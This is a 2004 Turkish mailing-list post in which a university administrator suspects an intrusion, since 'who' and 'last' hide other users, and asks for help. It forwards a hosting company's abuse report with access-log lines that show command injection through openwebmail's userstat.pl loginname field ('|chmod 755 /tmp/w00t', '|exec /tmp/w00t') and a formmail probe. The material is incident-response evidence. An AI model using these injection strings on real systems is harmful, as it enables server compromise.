From: Latife ZEYTİNELİ (lyolac@mku.edu.tr)
Date: Mon 21 Jun 2004 - 13:33:34 EEST
merhaba
who edigim zaman sadece kendimi goruyorum root oldugum halede diger
kullanıcalrı goremiyorum bu neyden kaynaklanabilir.
birilerinin sisteme girdiginden supheleniyorum
last dedigimde sadece kendimi goruyorum
oysa baska yerlerden baglananlar var onları goremiyorum
ve surekli syslogd den mesaj geliyor
birileri farklı isimde oturum acmıs
lutfen acil olarak bu konuda yardımcı olurmusunuz
kolay gelsin
birde su mesaj geldi
Dear Sir/Madame,
This Saturday (190604) somebody tried to gain root privileges on a
server in our serverpark. According to the log facility it was somebody
out of your ip space.
First he tried to gain shell acces by missusing some openwebmail bug and
then he tried to exploit the kernel with a local kernel exploit. We have
also found a script, it looks like there is some sort of deamon
listening on 194.27.44.15 who is waiting for connections from the
script, maybe some sort of autorooter/worm.
I hope you could have a look at this matter asap.
Kind Regards,
GrafiX Internet B.V.
Marcel Haman
access_log.1:194.27.44.15 - - [19/Jun/2004:14:12:40 +0200] "GET
/cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t
HTTP/1.0" 200 151
access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:41 +0200] "GET
/cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0"
200 -
access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:53 +0200] "GET
/cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t
HTTP/1.0" 200 151
access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:55 +0200] "GET
/cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0"
200 151
access_log.1:67.166.132.228 - - [19/Jun/2004:20:48:08 +0200] "GET
/cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Emaffiafeest%2
Ecom%
2Fcgi%2Dbin%2Fformmail%2Epl&recipient=cgiscanner%40mail%2Enu&msg=w00t
HTTP/1.1Content-Type: application/x-www-form-urlencoded" 400 299
------- End of Forwarded Message -------